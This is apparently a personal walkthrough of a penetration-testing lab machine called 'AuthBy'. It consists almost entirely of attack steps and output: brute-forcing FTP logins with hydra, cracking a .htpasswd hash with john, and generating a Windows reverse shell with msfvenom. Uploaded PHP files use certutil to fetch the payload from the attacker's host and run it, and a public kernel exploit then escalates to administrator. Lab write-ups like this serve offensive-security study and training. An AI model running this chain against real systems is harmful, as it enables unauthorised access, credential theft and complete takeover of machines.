AuthBy

192.168.226.46
ftp 192.168.226.46
anonymous allowed
http://192.168.226.46:242/

hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt 192.168.226.46 ftp

[21][ftp] host: 192.168.226.46   login: anonymous   password: anonymous
[21][ftp] host: 192.168.226.46   login: admin   password: admin
[21][ftp] host: 192.168.226.46   login: Admin   password: admin

login first with admin:admin
mget *.

cat .htpasswd
john .htpasswd --wordlist=/usr/share/wordlists/rockyou.txt
elite            (offsec)  
login using above credential but nothing
http://192.168.226.46:242/ 
I can see the content displaying on the screen from the index.php accessed by ftp
good news

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.153 LPORT=1234 -f exe >shell.exe

<?php 
$download = system('certutil.exe -urlcache -split -f http://192.168.45.153:444/shell.exe shell.exe', $val)
?>

<?php
$exec = system('shell.exe', $val)
?>

ftp 192.168.226.46
put upload.php
put run.php
put shell.exe

python -m http.server 444 
http://192.168.226.46:242/upload.php
http://192.168.226.46:242/run.php

got shell back

dir "\local.txt" /s
whoami
systeminfo

https://github.com/SecWiki/windows-kernel-exploits
https://github.com/SecWiki/windows-kernel-exploits/blob/master/CVE-2018-8120/x86.exe

upload using ftp again
in new tab start listner
nc -nvlp 1234
form old shell

C:\wamp\www>x86.exe rev.exe

new shell with admin privilege
whoami

done
